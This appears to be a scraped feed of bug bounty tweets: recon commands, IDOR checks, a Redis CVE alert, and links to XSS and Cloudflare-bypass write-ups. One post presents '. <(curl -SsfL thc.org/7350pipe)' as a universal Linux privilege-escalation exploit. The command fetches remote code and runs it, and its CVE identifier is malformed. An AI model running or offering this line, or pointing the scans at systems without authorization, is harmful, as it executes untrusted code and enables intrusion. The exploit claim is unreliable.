i don't remember who created this, but it's a good Recon Map ;) Recon Master-plan #BugBounty #recon

Hello, If you are just getting started into bug bounties and can't find enough resources, this thread might help you to find a way 👇

========= Master XSS ========= Share this with your friends 😀 Tags: #cybersecurity #hacking #bugbounty #xss #masterXSS #infosec #offsec #labs Check :🧵0/n 👇

I hate recon but here a good tip : 1 - Get the company IPs range X.X.X.X/24 2 - Run nmap -p 80,448,8080 IP/24 -oN file.txt 3 - Use any IP extractor or API in case of automation or bash then save it on IPs.txt 4- run httpx -l IPs.txt -o final.txt 5 - run nuclei -l final.txt

Bug Bounty Tips: 🐛💰 Here's a simple bug bounty tip for shopping site targets that can earn you some serious $$$$. I've stumbled upon 10+ similar issues on shopping sites that allow guest checkouts 🛒. Many overlook these issues because they require placing an order 📦.

GitHub - KingOfBugbounty/Bugbounty-Checklist: Tips and Tutorials for Bug Bounty and also Penetration Tests.🔥🔥 credit: Clandestine #bugbountytips #hacking #recon #bugcrowd #hackerone #infose github.com/KingOfBugbount…

Intigriti Yes github.com/plenumlab/rce-…

Good resources on #BugBounty for you to bookmark!🌟 1. kongsec.medium.com/how-to-js-for-… 2. medium.com/@investigator5… 3. medium.com/@ar_hawk/from-… 4. asdqw3.medium.com/xss-in-gmail-d… 5. medium.com/@deadoverflow/… #dorking #vulnerability #bugbountytip

🚨Alert🚨CVE-2023-41056: Redis Remote Code Execution Vulnerability Redis may incorrectly handle resizing of memory buffers which can result in incorrect accounting of buffer sizes and lead to heap overflow and potential remote code execution. 📊 1.4M+ services are found on the

Society is great at one thing: Teaching people how to become slaves.

Do your target using WordPress? If so, then you should check if they have rate limit on their WordPress login "wp-login.php" or not. Note, WordPress doesn't use rate limit on its login by default. #BugBounty #bugbountytips #bugbountytip

Advanced Recon Methodology For Web App

Cloudflare Bypasses Here are 10 Writeups about Cloudflare bypasses 1. medium.com/@the_harvester… (XSS) 2. cyberweapons.medium.com/reflected-xss-… (RXSS) 3. medium.com/@amitdutta6026… (SQLi) 4. medium.com/@mayankchoubey… (SID from XSS) 5. royzsec.medium.com/cloudflare-byp… (In Microsoft) 6.

Don't miss "A Zero to Hero Crash Course to Server-Side Request Forgery (SSRF)" by Ben Sadeghipour (@nahamsec)! 📅 Friday, Aug 9 ⏰ 12:15 PM 📍 Bug Bounty Village Classroom, Room W215 #BugBounty #DEFCON

GitHub Repos of Bug Bounty One Liners #bugbounty github.com/dwisiswant0/aw… github.com/twseptian/onel… github.com/0xPugal/One-Li… github.com/0xPugal/One-Li… github.com/daffainfo/Onel…

Iron what ? .. 99% what ?!

Cyber by night, tactical by day 👌😚

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner): “. <(curl -SsfL thc.org/7350pipe)”

🗝️ Top Checks for IDOR Bugs • Change IDs in URLs & APIs (e.g. /user?id=123) • Test DELETE & PUT requests, not just GET/POST • Swap numeric ↔ alphanumeric IDs • Hunt for ID references in JavaScript files • Inspect nested JSON objects for hidden IDs 💰 IDORs are easy to